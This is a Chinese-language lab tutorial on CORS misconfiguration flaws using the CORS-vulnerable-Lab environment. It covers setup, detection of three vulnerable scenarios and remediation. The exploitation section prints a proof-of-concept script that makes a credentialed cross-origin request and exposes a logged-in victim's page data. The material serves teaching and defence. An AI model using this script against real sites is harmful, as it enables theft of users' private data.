0x01 漏洞简介

跨域资源共享(CORS)是一种放宽同源策略的机制，它允许浏览器向跨源服务器，发出 XMLHttpRequest 请求，从而克服了 AJAX 只能同源使用的限制，以使不同的网站可以跨域获取数据，目前已经被绝大多数浏览器支持，并被主流网站广泛部署使用。跨域资源共享 CORS 漏洞主要是由于程序员配置不当，对于 Origin 源校验不严格，从而造成跨域问题，攻击者可以利用 CORS 错误配置漏洞，从恶意网站跨域读取受害网站的敏感信息。

这里只做简单介绍，关于 CORS 漏洞的详细分析可以点击查看这篇文章：CORS漏洞原理分析

0x02 漏洞环境

漏洞靶场 CORS-vulnerable-Lab 包含了与 CORS 配置错误相关的易受攻击代码。可以在本地虚机上部署易受攻击的代码，以实际利用 CORS 相关的错误配置问题。

• 项目地址：https://github.com/incredibleindishell/CORS-vulnerable-Lab

此项目代码需要满足以下配置环境，可利用 phpstudy 进行快速搭建。

1. Apache web server
2. PHP 5/7
3. MySQL Database

安装步骤如下：

1）下载并解压项目源代到phpstudy的网站 www 目录下

2）创建一个MySQL数据库，名字叫 ica_lab ，并将项目源码 database 目录下的 ica_lab.sql 文件导入到该数据库中

3）在文本编辑器中打开 c0nnection.php ，并修改连接数据库配置信息

$conn = mysqli_connect("127.0.0.1","root","root","ica_lab");

4）最后，访问靶场地址即可

该靶场内置了3个 CORS 的漏洞场景

• 场景一：信任任意 Origin 源
• 场景二：正则表达式检测 Origin 源
• 场景三：信任任意 null 源

0x03 漏洞检测

一般情况下，修改请求包 Header 中的 Origin 字段为任意域名或者为 null 的方式去检测该漏洞是否存在。

场景一：信任任意 Origin 源

应用程序接受来自任何 Origin 的 CORS 请求。该代码将 Origin 值放在 HTTP 响应头 Access-Control-Allow-Origin 中。现在，此配置将允许来自任何 Origin 的任何脚本向应用程序发出 CORS 请求。Web 浏览器将执行标准的 CORS 请求检查，来自恶意域的脚本将能够窃取数据。

应用程序接受 Origin 标头中指定的任何值。

场景二：正则表达式检测 Origin 源

应用程序已实施 CORS 策略并对列入白名单的域/子域执行“正则表达式”检查。在这种情况下，应用程序在代码中具有弱正则表达式实现，它只检查 HTTP 请求 Origin 标头中任何位置的域名 b0x.com 的存在。如果 HTTP 标头 Origin 的值为 inb0x.com 或 b0x.comlab.com，正则表达式会将其标记为通过。这种错误配置将导致跨源共享数据。

应用程序信任列入白名单的 Origin。

应用程序不允许任何任意来源。

应用程序弱正则表达式允许在域名开头具有白名单域字符串的 Origin。

应用程序弱正则表达式允许在域名末尾具有白名单域字符串的 Origin。

场景三：信任null源

在这种情况下，应用程序 HTTP 响应标头 Access-Control-Allow-Origin 始终设置为 null。当用户指定 null 以外的任何值时，应用程序不会处理它并在 HTTP 响应中继续反映 null 。允许攻击者执行漏洞利用的技巧很少，并且可以使用 CORS 请求过滤受害者的数据。

应用程序接受 Origin 标头中指定的 null 值。

注意事项

如果响应包 Header 中为以下情况 ，则不存在漏洞。

Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials:true

原因是因为浏览器会对此类情况的请求进行自动拦截，不具备漏洞利用条件。

0x04 漏洞利用

在 CORS-vulnerable-Lab 靶场的 POCs 目录下，有 CORS 漏洞利用的脚本

以 arbitrary_origin_exploit.html 为例，用文本编辑器打开该脚本文件，找到如下代码并根据实际应用场景进行修改

<script>
//向目标应用程序网页发出 CORS 请求以获取 HTTP 响应的函数
function exploit() {
 var xhttp = new XMLHttpRequest();
 xhttp.onreadystatechange = function() {
   if (this.readyState == 4 && this.status == 200) {
     var all = this.responseText;
     document.getElementById("load").innerHTML= all; // 分割打印被盗取的 HTTP 响应
     
      }
 };
 xhttp.open("GET", "http://192.168.126.6/CORS/arbitrary_origin.php", true); //将 URL 更改为错误配置 CORS 策略的 URL
 xhttp.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,\/;q=0.8");
 xhttp.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
 xhttp.withCredentials = true;
 xhttp.send();
}

</script>

将利用脚本放置在搭建的恶意网站下，当受害者在同一浏览器登录目标网站，并打开该恶意链接，即可盗取目标网站的 HTTP 响应内容。

0x05 漏洞修复

• 禁止配置 “Access-Control-Allow-Origin” 为 “*” 和 “null”；
• 严格校验 “Origin” 值，避免出现权限泄露；
• 避免使用 “Access-Control-Allow-Credentials:true”；
• 减少 “Access-Control-Allow-Methods” 所允许的方法；

参考文章

• https://www.bugbank.cn/live/view.html?id=111824
• https://blog.csdn.net/m0_38103658/article/details/102721402
• https://research.qianxin.com/archives/290